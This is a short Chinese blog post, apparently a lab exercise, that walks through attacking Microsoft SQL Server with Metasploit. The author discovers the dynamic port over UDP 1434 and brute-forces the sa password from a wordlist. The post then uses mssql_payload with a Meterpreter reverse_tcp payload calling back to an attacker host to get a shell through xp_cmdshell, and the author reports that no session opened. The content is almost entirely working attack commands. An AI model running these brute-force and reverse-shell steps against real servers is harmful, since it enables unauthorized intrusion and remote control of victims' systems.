攻擊sqlserver

首先通過UDP1434端口,查詢Sql server服務(wù)的TCP動態(tài)端口

msf > use auxiliary/scanner/mssql/mssql_ping

msf auxiliary(mssql_ping) > set rhosts 192.168.80.33

msf auxiliary(mssql_ping) > set threads 16

msf auxiliary(mssql_ping) > exploit


然后暴力破解sa用戶的密碼

msf auxiliary(mssql_ping) > use auxiliary/scanner/mssql/mssql_login

msf auxiliary(mssql_login) > set rhosts 192.168.80.33

msf auxiliary(mssql_login) > set username sa

msf auxiliary(mssql_login) > set pass_file /root/1.txt

msf auxiliary(mssql_login) > exploit


xp_cmdshell

以sa用戶運行mssql時,可以執(zhí)行xp_cmdshell存儲過程,該存儲過程允許直接與操作系統(tǒng)進行交互并執(zhí)行命令。

msf auxiliary(mssql_login) > use exploit/windows/mssql/mssql_payload

msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp

msf exploit(mssql_payload) > set lhost 192.168.80.163

msf exploit(mssql_payload) > set rhost 192.168.80.33

msf exploit(mssql_payload) > set password 123456

msf exploit(mssql_payload) > exploit

成功exploit后,會獲得目標(biāo)主機meterpreter shell。但是我并沒有測試成功,上傳Stage完成后,提示如下內(nèi)容。。

[*] Exploit completed, but no session was created.

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容